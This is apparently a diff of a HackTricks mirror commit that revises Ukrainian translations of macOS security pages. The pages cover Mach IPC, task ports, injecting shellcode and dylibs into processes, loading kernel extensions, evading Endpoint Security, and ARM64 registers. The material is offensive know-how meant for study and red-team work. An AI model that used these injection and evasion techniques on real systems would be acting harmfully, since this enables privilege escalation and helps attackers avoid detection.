maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/macos-hardening/macos-security-and-privilege-escalation

Browse Source
This commit is contained in:
Translator 2025-01-03 06:38:39 +00:00
parent f8dfce0b6a
commit 1178403e6b
243 changed files with 1898 additions and 1922 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/README.md
View File

@ -4,7 +4,7 @@
## XNU Kernel
**Ядро macOS - це XNU**, що означає "X is Not Unix". Це ядро в основному складається з **Mach мікроядра** (про яке буде сказано пізніше) **та** елементів з Berkeley Software Distribution (**BSD**). XNU також забезпечує платформу для **драйверів ядра через систему, звану I/O Kit**. Ядро XNU є частиною проекту з відкритим вихідним кодом Darwin, що означає, що **його вихідний код є вільно доступним**.
**Основою macOS є XNU**, що означає "X is Not Unix". Цей ядро в основному складається з **Mach мікроядра** (про яке буде сказано пізніше) **та** елементів з Berkeley Software Distribution (**BSD**). XNU також забезпечує платформу для **ядрових драйверів через систему, звану I/O Kit**. Ядро XNU є частиною проекту з відкритим кодом Darwin, що означає, що **його вихідний код є вільно доступним**.
З точки зору дослідника безпеки або розробника Unix, **macOS** може здаватися досить **схожим** на систему **FreeBSD** з елегантним графічним інтерфейсом і безліччю спеціальних додатків. Більшість додатків, розроблених для BSD, будуть компілюватися та працювати на macOS без необхідності модифікацій, оскільки командні інструменти, знайомі користувачам Unix, присутні в macOS. Однак, оскільки ядро XNU включає Mach, існують деякі суттєві відмінності між традиційною системою, подібною до Unix, і macOS, і ці відмінності можуть викликати потенційні проблеми або надавати унікальні переваги.
@ -12,7 +12,7 @@
### Mach
Mach - це **мікроядро**, розроблене для **сумісності з UNIX**. Одним з його ключових принципів дизайну було **мінімізувати** кількість **коду**, що виконується в **ядровому** просторі, і замість цього дозволити багатьом типовим функціям ядра, таким як файлові системи, мережеві з'єднання та I/O, **виконуватися як завдання на рівні користувача**.
Mach є **мікроядром**, розробленим для **сумісності з UNIX**. Одним з його ключових принципів дизайну було **мінімізувати** кількість **коду**, що виконується в **ядровому** просторі, і замість цього дозволити багатьом типовим функціям ядра, таким як файлові системи, мережеві з'єднання та I/O, **виконуватися як завдання на рівні користувача**.
У XNU Mach **відповідає за багато критично важливих низькорівневих операцій**, які зазвичай обробляє ядро, таких як планування процесора, багатозадачність та управління віртуальною пам'яттю.
@ -27,19 +27,19 @@ Mach - це **мікроядро**, розроблене для **сумісно
- Стек TCP/IP та сокети
- Брандмауер та фільтрація пакетів
Розуміння взаємодії між BSD та Mach може бути складним через їх різні концептуальні рамки. Наприклад, BSD використовує процеси як свою основну одиницю виконання, тоді як Mach працює на основі потоків. Ця розбіжність узгоджується в XNU шляхом **асоціювання кожного процесу BSD з завданням Mach**, яке містить точно один потік Mach. Коли використовується системний виклик fork() у BSD, код BSD в ядрі використовує функції Mach для створення структури завдання та потоку.
Розуміння взаємодії між BSD та Mach може бути складним через їх різні концептуальні рамки. Наприклад, BSD використовує процеси як свою основну одиницю виконання, тоді як Mach працює на основі потоків. Ця розбіжність узгоджується в XNU шляхом **асоціювання кожного процесу BSD з завданням Mach**, яке містить точно один потік Mach. Коли використовується системний виклик fork() BSD, код BSD в ядрі використовує функції Mach для створення структури завдання та потоку.
Більше того, **Mach і BSD кожен підтримує різні моделі безпеки**: **модель безпеки Mach** базується на **правах портів**, тоді як модель безпеки BSD працює на основі **власності процесів**. Різниці між цими двома моделями іноді призводили до вразливостей підвищення локальних привілеїв. Окрім типових системних викликів, також існують **Mach traps, які дозволяють програмам користувацького простору взаємодіяти з ядром**. Ці різні елементи разом формують багатогранну, гібридну архітектуру ядра macOS.
### I/O Kit - Драйвери
I/O Kit - це відкритий, об'єктно-орієнтований **фреймворк драйверів пристроїв** в ядрі XNU, який обробляє **динамічно завантажені драйвери пристроїв**. Це дозволяє модульному коду бути доданим до ядра на льоту, підтримуючи різноманітне апаратне забезпечення.
I/O Kit є відкритим, об'єктно-орієнтованим **фреймворком драйверів пристроїв** в ядрі XNU, який обробляє **динамічно завантажувані драйвери пристроїв**. Це дозволяє модульному коду бути доданим до ядра на льоту, підтримуючи різноманітне апаратне забезпечення.
{{#ref}}
macos-iokit.md
{{#endref}}
### IPC - Міжпроцесна комунікація
### IPC - Міжпроцесорна комунікація
{{#ref}}
../macos-proces-abuse/macos-ipc-inter-process-communication/
@ -65,7 +65,7 @@ macos-system-extensions.md
## Посилання
- [**Посібник хакера Mac**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt_other?_encoding=UTF8&me=&qid=)
- [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt_other?_encoding=UTF8&me=&qid=)
- [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
{{#include ../../../banners/hacktricks-training.md}}

86
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-ipc-inter-process-communication/README.md
View File

@ -1,69 +1,69 @@
# macOS IPC - Міжпроцесорна комунікація
# macOS IPC - Inter Process Communication
{{#include ../../../../banners/hacktricks-training.md}}
## Mach повідомлення через порти
## Mach messaging via Ports
### Основна інформація
### Basic Information
Mach використовує **задачі** як **найменшу одиницю** для обміну ресурсами, і кожна задача може містити **кілька потоків**. Ці **задачі та потоки відображаються 1:1 на процеси та потоки POSIX**.
Mach використовує **tasks** як **найменшу одиницю** для обміну ресурсами, і кожен task може містити **кілька потоків**. Ці **tasks і threads відображаються 1:1 на POSIX процеси і потоки**.
Комунікація між задачами відбувається через міжпроцесорну комунікацію Mach (IPC), використовуючи односторонні канали зв'язку. **Повідомлення передаються між портами**, які діють як **черги повідомлень**, що управляються ядром.
Комунікація між tasks відбувається через Mach Inter-Process Communication (IPC), використовуючи односторонні канали зв'язку. **Повідомлення передаються між портами**, які діють як **черги повідомлень**, що управляються ядром.
Кожен процес має **таблицю IPC**, в якій можна знайти **mach порти процесу**. Ім'я mach порту насправді є числом (вказівником на об'єкт ядра).
Кожен процес має **IPC таблицю**, в якій можна знайти **mach порти процесу**. Ім'я mach порту насправді є числом (вказівником на об'єкт ядра).
Процес також може надіслати ім'я порту з певними правами **іншій задачі**, і ядро зробить так, щоб цей запис у **таблиці IPC іншої задачі** з'явився.
Процес також може надіслати ім'я порту з певними правами **іншому task** і ядро зробить цей запис у **IPC таблиці іншого task** видимим.
### Права портів
### Port Rights
Права портів, які визначають, які операції може виконувати задача, є ключовими для цієї комунікації. Можливі **права портів** ([визначення звідси](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)):
Права порту, які визначають, які операції може виконувати task, є ключовими для цієї комунікації. Можливі **права порту** ([визначення звідси](https://docs.darlinghq.org/internals/macos-specifics/mach-ports.html)):
- **Право отримання**, яке дозволяє отримувати повідомлення, надіслані на порт. Mach порти є MPSC (багато-виробник, один-споживач) чергами, що означає, що може бути лише **одне право отримання для кожного порту** в усій системі (на відміну від труб, де кілька процесів можуть утримувати дескриптори файлів для читання з однієї труби).
- **Задача з правом отримання** може отримувати повідомлення та **створювати права надсилання**, що дозволяє їй надсилати повідомлення. Спочатку лише **власна задача має право отримання над своїм портом**.
- **Право надсилання**, яке дозволяє надсилати повідомлення на порт.
- Право надсилання може бути **клоновано**, тому задача, що володіє правом надсилання, може клонувати право та **надати його третій задачі**.
- **Право надсилання один раз**, яке дозволяє надіслати одне повідомлення на порт, а потім зникає.
- **Право набору портів**, яке позначає абір портів_, а не один порт. Витягування повідомлення з набору портів витягує повідомлення з одного з портів, які він містить. Набори портів можуть використовуватися для прослуховування кількох портів одночасно, подібно до `select`/`poll`/`epoll`/`kqueue` в Unix.
- **Мертве ім'я**, яке не є фактичним правом порту, а лише заповнювачем. Коли порт знищується, всі існуючі права портів на порт перетворюються на мертві імена.
- **Receive right**, що дозволяє отримувати повідомлення, надіслані на порт. Mach порти є MPSC (multiple-producer, single-consumer) чергами, що означає, що може бути лише **одне право отримання для кожного порту** в усій системі (на відміну від труб, де кілька процесів можуть утримувати дескриптори файлів для читання з однієї труби).
- **Task з Receive** правом може отримувати повідомлення і **створювати Send права**, що дозволяє йому надсилати повідомлення. Спочатку лише **власний task має Receive право на свій порт**.
- **Send right**, що дозволяє надсилати повідомлення на порт.
- Send право може бути **клоновано**, тому task, що володіє Send правом, може клонувати право і **надати його третьому task**.
- **Send-once right**, що дозволяє надіслати одне повідомлення на порт і потім зникати.
- **Port set right**, що позначає абір портів_, а не один порт. Витягування повідомлення з набору портів витягує повідомлення з одного з портів, які він містить. Набори портів можуть використовуватися для прослуховування кількох портів одночасно, подібно до `select`/`poll`/`epoll`/`kqueue` в Unix.
- **Dead name**, що не є фактичним правом порту, а лише заповнювачем. Коли порт знищується, всі існуючі права порту на порт перетворюються на мертві імена.
**Задачі можуть передавати права надсилання іншим**, дозволяючи їм надсилати повідомлення назад. **Права надсилання також можуть бути клоновані, тому задача може дублювати і надавати право третій задачі**. Це, в поєднанні з проміжним процесом, відомим як **bootstrap server**, дозволяє ефективну комунікацію між задачами.
**Tasks можуть передавати SEND права іншим**, дозволяючи їм надсилати повідомлення назад. **SEND права також можуть бути клоновані, тому task може дублювати і надавати право третьому task**. Це, в поєднанні з проміжним процесом, відомим як **bootstrap server**, дозволяє ефективну комунікацію між tasks.
### Файлові порти
### File Ports
Файлові порти дозволяють інкапсулювати дескриптори файлів у Mac портах (використовуючи права портів Mach). Можна створити `fileport` з даного FD, використовуючи `fileport_makeport`, і створити FD з файлового порту, використовуючи `fileport_makefd`.
File ports дозволяють інкапсулювати дескриптори файлів у Mac портах (використовуючи права Mach порту). Можна створити `fileport` з даного FD, використовуючи `fileport_makeport`, і створити FD з fileport, використовуючи `fileport_makefd`.
### Встановлення комунікації
### Establishing a communication
#### Кроки:
#### Steps:
Як вже згадувалося, для встановлення каналу комунікації залучено **bootstrap server** (**launchd** в mac).
Як згадувалося, для встановлення каналу зв'язку залучено **bootstrap server** (**launchd** в mac).
1. Задача **A** ініціює **новий порт**, отримуючи **ПРАВО ОТРИМАННЯ** в процесі.
2. Задача **A**, будучи власником права отримання, **генерує ПРАВО НАДСИЛАННЯ для порту**.
3. Задача **A** встановлює **з'єднання** з **bootstrap server**, надаючи **ім'я служби порту** та **ПРАВО НАДСИЛАННЯ** через процедуру, відому як реєстрація bootstrap.
4. Задача **B** взаємодіє з **bootstrap server**, щоб виконати bootstrap **пошук за ім'ям служби**. Якщо успішно, **сервер дублює ПРАВО НАДСИЛАННЯ**, отримане від Задачі A, і **передає його Задачі B**.
5. Отримавши ПРАВО НАДСИЛАННЯ, Задача **B** здатна **сформулювати** **повідомлення** і надіслати його **Задачі A**.
6. Для двосторонньої комунікації зазвичай Задача **B** генерує новий порт з **ПРАВОМ ОТРИМАННЯ** та **ПРАВОМ НАДСИЛАННЯ**, і надає **ПРАВО НАДСИЛАННЯ Задачі A**, щоб вона могла надсилати повідомлення Задачі B (двостороння комунікація).
1. Task **A** ініціює **новий порт**, отримуючи **RECEIVE право** в процесі.
2. Task **A**, будучи власником RECEIVE права, **генерує SEND право для порту**.
3. Task **A** встановлює **з'єднання** з **bootstrap server**, надаючи **ім'я служби порту** та **SEND право** через процедуру, відому як реєстрація bootstrap.
4. Task **B** взаємодіє з **bootstrap server**, щоб виконати bootstrap **пошук для імені служби**. Якщо успішно, **сервер дублює SEND право**, отримане від Task A, і **передає його Task B**.
5. Отримавши SEND право, Task **B** здатний **сформулювати** **повідомлення** і надіслати його **Task A**.
6. Для двосторонньої комунікації зазвичай task **B** генерує новий порт з **RECEIVE** правом і **SEND** правом, і надає **SEND право Task A**, щоб він міг надсилати повідомлення TASK B (двостороння комунікація).
Bootstrap server **не може аутентифікувати** ім'я служби, яке заявляє задача. Це означає, що **задача** може потенційно **вдаватись під будь-яку системну задачу**, наприклад, неправильно **заявляючи ім'я служби авторизації** і потім схвалюючи кожен запит.
Bootstrap server **не може аутентифікувати** ім'я служби, яке заявляє task. Це означає, що **task** може потенційно **вдаватись під будь-який системний task**, наприклад, неправильно **заявляючи ім'я служби авторизації** і потім схвалюючи кожен запит.
Тоді Apple зберігає **імена служб, наданих системою**, у захищених конфігураційних файлах, розташованих у **каталогах, захищених SIP**: `/System/Library/LaunchDaemons` та `/System/Library/LaunchAgents`. Поряд з кожним ім'ям служби також зберігається **асоційований бінарний файл**. Bootstrap server створить і утримає **ПРАВО ОТРИМАННЯ для кожного з цих імен служб**.
Тоді Apple зберігає **імена служб, наданих системою**, у захищених конфігураційних файлах, розташованих у **SIP-захищених** каталогах: `/System/Library/LaunchDaemons` та `/System/Library/LaunchAgents`. Поряд з кожним ім'ям служби, **також зберігається асоційований бінарний файл**. Bootstrap server створить і утримає **RECEIVE право для кожного з цих імен служб**.
Для цих попередньо визначених служб **процес пошуку трохи відрізняється**. Коли ім'я служби шукається, launchd динамічно запускає службу. Новий робочий процес виглядає так:
- Задача **B** ініціює bootstrap **пошук** за ім'ям служби.
- **launchd** перевіряє, чи задача працює, і якщо ні, **запускає** її.
- Задача **A** (служба) виконує **реєстрацію bootstrap**. Тут **bootstrap** сервер створює ПРАВО НАДСИЛАННЯ, утримує його і **передає ПРАВО ОТРИМАННЯ Задачі A**.
- launchd дублює **ПРАВО НАДСИЛАННЯ і надсилає його Задачі B**.
- Задача **B** генерує новий порт з **ПРАВОМ ОТРИМАННЯ** та **ПРАВОМ НАДСИЛАННЯ**, і надає **ПРАВО НАДСИЛАННЯ Задачі A** (службі), щоб вона могла надсилати повідомлення Задачі B (двостороння комунікація).
- Task **B** ініціює bootstrap **пошук** для імені служби.
- **launchd** перевіряє, чи працює task, і якщо ні, **запускає** його.
- Task **A** (служба) виконує **bootstrap check-in**. Тут **bootstrap** сервер створює SEND право, утримує його і **передає RECEIVE право Task A**.
- launchd дублює **SEND право і надсилає його Task B**.
- Task **B** генерує новий порт з **RECEIVE** правом і **SEND** правом, і надає **SEND право Task A** (службі), щоб вона могла надсилати повідомлення TASK B (двостороння комунікація).
Однак цей процес застосовується лише до попередньо визначених системних задач. Несистемні задачі все ще працюють, як було описано спочатку, що може потенційно дозволити вдавання.
Однак цей процес застосовується лише до попередньо визначених системних tasks. Несистемні tasks все ще працюють, як описано спочатку, що може потенційно дозволити вдавання.
### Mach Повідомлення
### A Mach Message
[Знайдіть більше інформації тут](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
[Find more info here](https://sector7.computest.nl/post/2023-10-xpc-audit-token-spoofing/)
Функція `mach_msg`, по суті, є системним викликом, що використовується для надсилання та отримання Mach повідомлень. Функція вимагає, щоб повідомлення, яке потрібно надіслати, було першим аргументом. Це повідомлення повинно починатися зі структури `mach_msg_header_t`, за якою слідує фактичний вміст повідомлення. Структура визначається наступним чином:
Функція `mach_msg`, по суті, є системним викликом, що використовується для надсилання та отримання Mach повідомлень. Функція вимагає, щоб повідомлення, що надсилається, було першим аргументом. Це повідомлення повинно починатися з структури `mach_msg_header_t`, за якою слідує фактичний вміст повідомлення. Структура визначається наступним чином:
```c
typedef struct {
mach_msg_bits_t msgh_bits;
@ -89,7 +89,7 @@ mach_msg_id_t msgh_id;
- `msgh_id`: ID цього повідомлення, який інтерпретується отримувачем.
> [!CAUTION]
> Зверніть увагу, що **mach повідомлення надсилаються через \_mach порт**\_, який є **каналом зв'язку з одним отримувачем** та **багатьма відправниками**, вбудованим у ядро mach. **Багато процесів** можуть **надсилати повідомлення** на mach порт, але в будь-який момент лише **один процес може читати** з нього.
> Зверніть увагу, що **mach повідомлення надсилаються через \_mach порт**\_, який є **каналом зв'язку з одним отримувачем** та **багатьма відправниками**, вбудованим у ядро mach. **Кілька процесів** можуть **надсилати повідомлення** на mach порт, але в будь-який момент лише **один процес може читати** з нього.
### Перерахувати порти
```bash
@ -231,7 +231,7 @@ printf("Sent a message\n");
- **Хост-привілейований порт**: Процес з правом **Send** над цим портом може виконувати **привілейовані дії**, такі як завантаження розширення ядра. **Процес повинен бути root**, щоб отримати цей дозвіл.
- Більше того, для виклику **`kext_request`** API потрібно мати інші права **`com.apple.private.kext*`**, які надаються лише бінарним файлам Apple.
- **Порт імені завдання:** Непривілейована версія _порт завдання_. Він посилається на завдання, але не дозволяє його контролювати. Єдине, що, здається, доступно через нього, це `task_info()`.
- **Порт завдання** (також відомий як порт ядра)**:** З правом Send над цим портом можливо контролювати завдання (читати/писати пам'ять, створювати потоки...).
- **Порт завдання** (також відомий як порт ядра): З правом Send над цим портом можливо контролювати завдання (читати/писати пам'ять, створювати потоки...).
- Викличте `mach_task_self()`, щоб **отримати ім'я** для цього порту для викликаного завдання. Цей порт лише **успадковується** через **`exec()`**; нове завдання, створене за допомогою `fork()`, отримує новий порт завдання (як особливий випадок, завдання також отримує новий порт завдання після `exec()` в suid бінарі). Єдиний спосіб створити завдання та отримати його порт - це виконати ["танець обміну портами"](https://robert.sesek.com/2014/1/changes_to_xnu_mach_ipc.html) під час виконання `fork()`.
- Це обмеження для доступу до порту (з `macos_task_policy` з бінарного файлу `AppleMobileFileIntegrity`):
- Якщо додаток має **`com.apple.security.get-task-allow` entitlement**, процеси з **того ж користувача можуть отримати доступ до порту завдання** (зазвичай додається Xcode для налагодження). Процес **нотаризації** не дозволить цього для виробничих релізів.
@ -500,11 +500,11 @@ gcc -framework Foundation -framework Appkit sc_inject.m -o sc_inject
```
### Впровадження Dylib у потік через порт завдання
У macOS **потоки** можуть бути маніпульовані через **Mach** або за допомогою **posix `pthread` api**. Потік, який ми створили в попередньому впровадженні, був створений за допомогою Mach api, тому **він не відповідає стандарту posix**.
У macOS **потоки** можуть бути маніпульовані через **Mach** або за допомогою **posix `pthread` api**. Потік, який ми створили в попередньому впровадженні, був створений за допомогою Mach api, тому **він не відповідає стандартам posix**.
Було можливим **впровадити простий shellcode** для виконання команди, оскільки він **не потребував роботи з posix** сумісними api, лише з Mach. **Більш складні впровадження** вимагатимуть, щоб **потік** також був **сумісний з posix**.
Отже, щоб **покращити потік**, він повинен викликати **`pthread_create_from_mach_thread`**, що створить **дійсний pthread**. Тоді цей новий pthread може **викликати dlopen**, щоб **завантажити dylib** з системи, тому замість написання нового shellcode для виконання різних дій можна завантажити власні бібліотеки.
Отже, щоб **покращити потік**, він повинен викликати **`pthread_create_from_mach_thread`**, що створить **дійсний pthread**. Потім цей новий pthread може **викликати dlopen**, щоб **завантажити dylib** з системи, тому замість написання нового shellcode для виконання різних дій можна завантажити власні бібліотеки.
Ви можете знайти **приклади dylibs** у (наприклад, той, що генерує журнал, а потім ви можете його прослухати):

8
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-kernel-extensions.md
View File

@ -14,7 +14,7 @@ Kernel extensions (Kexts) — це **пакети** з розширенням **
<figure><img src="../../../images/image (327).png" alt=""><figcaption></figcaption></figure>
- Розширення ядра повинно бути **підписане сертифікатом підпису коду ядра**, який може бути **наданий тільки Apple**. Хто детально розгляне компанію та причини, чому це необхідно.
- Розширення ядра повинно бути **підписане сертифікатом підпису коду ядра**, який може бути **наданий лише Apple**. Хто детально розгляне компанію та причини, чому це необхідно.
- Розширення ядра також повинно бути **нотаризоване**, Apple зможе перевірити його на наявність шкідливого ПЗ.
- Потім, **кореневий** користувач є тим, хто може **завантажити розширення ядра**, а файли всередині пакета повинні **належати кореню**.
- Під час процесу завантаження пакет повинен бути підготовлений у **захищеному місці, що не є кореневим**: `/Library/StagedExtensions` (вимагає надання `com.apple.rootless.storage.KernelExtensionManagement`).
@ -22,7 +22,7 @@ Kernel extensions (Kexts) — це **пакети** з розширенням **
### Процес завантаження
У Catalina це виглядало так: Цікаво відзначити, що процес **перевірки** відбувається в **userland**. Однак тільки програми з наданням **`com.apple.private.security.kext-management`** можуть **запитувати у ядра завантажити розширення**: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd`
У Catalina це виглядало так: Цікаво відзначити, що процес **перевірки** відбувається в **userland**. Однак лише програми з наданням **`com.apple.private.security.kext-management`** можуть **запитувати у ядра завантажити розширення**: `kextcache`, `kextload`, `kextutil`, `kextd`, `syspolicyd`
1. **`kextutil`** cli **починає** процес **перевірки** для завантаження розширення
- Він спілкуватиметься з **`kextd`**, використовуючи **Mach service**.
@ -51,14 +51,14 @@ kextstat | grep " 22 " | cut -c2-5,50- | cut -d '(' -f1
### Local Kerlnelcache
В iOS він знаходиться у **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`**, в macOS ви можете знайти його за допомогою: **`find / -name "kernelcache" 2>/dev/null`** \
В iOS він розташований у **`/System/Library/Caches/com.apple.kernelcaches/kernelcache`**, в macOS ви можете знайти його за допомогою: **`find / -name "kernelcache" 2>/dev/null`** \
У моєму випадку в macOS я знайшов його в:
- `/System/Volumes/Preboot/1BAEB4B5-180B-4C46-BD53-51152B7D92DA/boot/DAD35E7BC0CDA79634C20BD1BD80678DFB510B2AAD3D25C1228BB34BCD0A711529D3D571C93E29E1D0C1264750FA043F/System/Library/Caches/com.apple.kernelcaches/kernelcache`
#### IMG4
Формат файлу IMG4 - це контейнерний формат, який використовується Apple в його пристроях iOS та macOS для безпечного **зберігання та перевірки компонентів прошивки** (як-от **kernelcache**). Формат IMG4 включає заголовок і кілька тегів, які інкапсулюють різні частини даних, включаючи фактичний корисний вантаж (як-от ядро або завантажувач), підпис та набір властивостей маніфесту. Формат підтримує криптографічну перевірку, що дозволяє пристрою підтверджувати автентичність та цілісність компонента прошивки перед його виконанням.
Формат файлу IMG4 - це контейнерний формат, який використовується Apple в її пристроях iOS та macOS для безпечного **зберігання та перевірки компонентів прошивки** (як-от **kernelcache**). Формат IMG4 включає заголовок і кілька тегів, які інкапсулюють різні частини даних, включаючи фактичний корисний навантаження (як-от ядро або завантажувач), підпис і набір властивостей маніфесту. Формат підтримує криптографічну перевірку, що дозволяє пристрою підтверджувати автентичність та цілісність компонента прошивки перед його виконанням.
Зазвичай він складається з наступних компонентів:

10
src/macos-hardening/macos-security-and-privilege-escalation/mac-os-architecture/macos-system-extensions.md
View File

@ -16,7 +16,7 @@ DriverKit є заміною для kernel extensions, які **надають а
### **Network Extensions**
Network Extensions надають можливість налаштовувати мережеву поведінку. Існує кілька типів Network Extensions:
Network Extensions надають можливість налаштування мережевої поведінки. Існує кілька типів Network Extensions:
- **App Proxy**: Використовується для створення VPN-клієнта, який реалізує орієнтований на потоки, кастомний VPN-протокол. Це означає, що він обробляє мережевий трафік на основі з'єднань (або потоків), а не окремих пакетів.
- **Packet Tunnel**: Використовується для створення VPN-клієнта, який реалізує орієнтований на пакети, кастомний VPN-протокол. Це означає, що він обробляє мережевий трафік на основі окремих пакетів.
@ -30,12 +30,12 @@ Endpoint Security - це фреймворк, наданий Apple в macOS, як
Цей фреймворк надає **збірку API для моніторингу та контролю системної активності**, такої як виконання процесів, події файлової системи, мережеві та ядрові події.
Ядро цього фреймворку реалізовано в ядрі, як Kernel Extension (KEXT), розташоване за **`/System/Library/Extensions/EndpointSecurity.kext`**. Цей KEXT складається з кількох ключових компонентів:
Ядро цього фреймворку реалізовано в ядрі, як Kernel Extension (KEXT), розташоване за адресою **`/System/Library/Extensions/EndpointSecurity.kext`**. Цей KEXT складається з кількох ключових компонентів:
- **EndpointSecurityDriver**: Діє як "точка входу" для розширення ядра. Це основна точка взаємодії між ОС та фреймворком Endpoint Security.
- **EndpointSecurityEventManager**: Цей компонент відповідає за реалізацію ядрових хуків. Ядрові хуки дозволяють фреймворку моніторити системні події, перехоплюючи системні виклики.
- **EndpointSecurityClientManager**: Це управляє зв'язком з клієнтами простору користувача, відстежуючи, які клієнти підключені та потребують отримання сповіщень про події.
- **EndpointSecurityMessageManager**: Це надсилає повідомлення та сповіщення про події клієнтам простору користувача.
- **EndpointSecurityClientManager**: Цей компонент управляє зв'язком з клієнтами простору користувача, відстежуючи, які клієнти підключені та потребують отримання сповіщень про події.
- **EndpointSecurityMessageManager**: Цей компонент надсилає повідомлення та сповіщення про події клієнтам простору користувача.
Події, які фреймворк Endpoint Security може моніторити, класифікуються на:
@ -61,7 +61,7 @@ Endpoint Security - це фреймворк, наданий Apple в macOS, як
## Обхід ESF
ESF використовується інструментами безпеки, які намагатимуться виявити червону команду, тому будь-яка інформація про те, як цього можна уникнути, звучить цікаво.
ESF використовується інструментами безпеки, які намагатимуться виявити червону команду, тому будь-яка інформація про те, як це можна уникнути, звучить цікаво.
### CVE-2021-30965

52
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/README.md
View File

File diff suppressed because one or more lines are too long

88
src/macos-hardening/macos-security-and-privilege-escalation/macos-apps-inspecting-debugging-and-fuzzing/arm64-basic-assembly.md
View File

@ -4,7 +4,7 @@
## **Рівні виключень - EL (ARM64v8)**
В архітектурі ARMv8 рівні виконання, відомі як Рівні виключень (EL), визначають рівень привілеїв та можливості середовища виконання. Є чотири рівні виключень, від EL0 до EL3, кожен з яких виконує різну функцію:
У архітектурі ARMv8 рівні виконання, відомі як Рівні виключень (EL), визначають рівень привілеїв та можливості середовища виконання. Є чотири рівні виключень, від EL0 до EL3, кожен з яких виконує різну функцію:
1. **EL0 - Режим користувача**:
- Це найменш привілейований рівень, який використовується для виконання звичайного коду додатків.
@ -13,7 +13,7 @@
- Більшість ядер операційних систем працюють на цьому рівні.
- EL1 має більше привілеїв, ніж EL0, і може отримувати доступ до системних ресурсів, але з деякими обмеженнями для забезпечення цілісності системи.
3. **EL2 - Режим гіпервізора**:
- Цей рівень використовується для віртуалізації. Гіпервізор, що працює на EL2, може керувати кількома операційними системами (кожна у своєму EL1), що працюють на одному фізичному обладнанні.
- Цей рівень використовується для віртуалізації. Гіпервізор, що працює на EL2, може керувати кількома операційними системами (кожна у своєму EL1), що працюють на одному фізичному апаратному забезпеченні.
- EL2 надає функції для ізоляції та контролю віртуалізованих середовищ.
4. **EL3 - Режим безпечного монітора**:
- Це найпривілейованіший рівень, який часто використовується для безпечного завантаження та довірених середовищ виконання.
@ -29,7 +29,7 @@ ARM64 має **31 загальний реєстр**, позначений `x0`
- **`x0`** також несе дані повернення функції.
2. **`x8`** - У ядрі Linux `x8` використовується як номер системного виклику для інструкції `svc`. **У macOS використовується x16!**
3. **`x9`** до **`x15`** - Більше тимчасових реєстрів, часто використовуються для локальних змінних.
4. **`x16`** та **`x17`** - **Реєстри внутрішньопроцедурного виклику**. Тимчасові реєстри для негайних значень. Вони також використовуються для непрямих викликів функцій та PLT (таблиця зв'язків процедур).
4. **`x16`** та **`x17`** - **Реєстри внутрішньопроцедурного виклику**. Тимчасові реєстри для негайних значень. Вони також використовуються для непрямих викликів функцій та PLT (таблиці зв'язків процедур).
- **`x16`** використовується як **номер системного виклику** для інструкції **`svc`** в **macOS**.
5. **`x18`** - **Реєстр платформи**. Може використовуватися як загальний реєстр, але на деяких платформах цей реєстр зарезервований для специфічних для платформи використань: вказівник на блок середовища поточного потоку в Windows або вказівник на структуру **виконуваного завдання в ядрі linux**.
6. **`x19`** до **`x28`** - Це реєстри, збережені викликом. Функція повинна зберігати значення цих реєстрів для свого виклику, тому вони зберігаються в стеку та відновлюються перед поверненням до виклику.
@ -39,22 +39,22 @@ ARM64 має **31 загальний реєстр**, позначений `x0`
- Його також можна використовувати як будь-який інший реєстр.
- Якщо поточна функція збирається викликати нову функцію і, отже, перезаписати `lr`, вона спочатку зберігає його в стеку, це епілог (`stp x29, x30 , [sp, #-48]; mov x29, sp` -> Зберегти `fp` та `lr`, створити простір і отримати новий `fp`) і відновлює його в кінці, це пролог (`ldp x29, x30, [sp], #48; ret` -> Відновити `fp` та `lr` і повернутися).
9. **`sp`** - **Вказівник стеку**, використовується для відстеження верхньої частини стеку.
- Значення **`sp`** завжди повинно зберігатися принаймні на **квадратному** **вирівнюванні**, інакше може виникнути виняток вирівнювання.
10. **`pc`** - **Лічильник програми**, який вказує на наступну інструкцію. Цей реєстр може оновлюватися лише через генерацію виключень, повернення з виключень та переходи. Єдині звичайні інструкції, які можуть читати цей реєстр, - це переходи з посиланням (BL, BLR), щоб зберегти адресу **`pc`** в **`lr`** (реєстр зв'язку).
11. **`xzr`** - **Нульовий реєстр**. Також називається **`wzr`** у його **32**-бітній формі. Може використовуватися для отримання нульового значення легко (звичайна операція) або для виконання порівнянь за допомогою **`subs`**, таких як **`subs XZR, Xn, #10`**, зберігаючи результуючі дані нікуди (в **`xzr`**).
- Значення **`sp`** завжди повинно зберігатися принаймні з **вирівнюванням** **quadword**, інакше може виникнути виняток вирівнювання.
10. **`pc`** - **Лічильник програми**, який вказує на наступну інструкцію. Цей реєстр може бути оновлений лише через генерацію виключень, повернення з виключень та переходи. Єдині звичайні інструкції, які можуть читати цей реєстр, - це переходи з посиланням (BL, BLR), щоб зберегти адресу **`pc`** в **`lr`** (реєстр зв'язку).
11. **`xzr`** - **Нульовий реєстр**. Також називається **`wzr`** у його **32**-бітній формі. Може використовуватися для отримання нульового значення (звичайна операція) або для виконання порівнянь за допомогою **`subs`**, таких як **`subs XZR, Xn, #10`**, зберігаючи результуючі дані нікуди (в **`xzr`**).
Реєстри **`Wn`** є **32-бітною** версією реєстрів **`Xn`**.
### SIMD та плаваючі реєстри
Крім того, є ще **32 реєстри довжиною 128 біт**, які можуть використовуватися в оптимізованих операціях з одночасним виконанням (SIMD) та для виконання арифметики з плаваючою комою. Вони називаються реєстрами Vn, хоча вони також можуть працювати в **64**-бітному, **32**-бітному, **16**-бітному та **8**-бітному режимах, і тоді їх називають **`Qn`**, **`Dn`**, **`Sn`**, **`Hn`** та **`Bn`**.
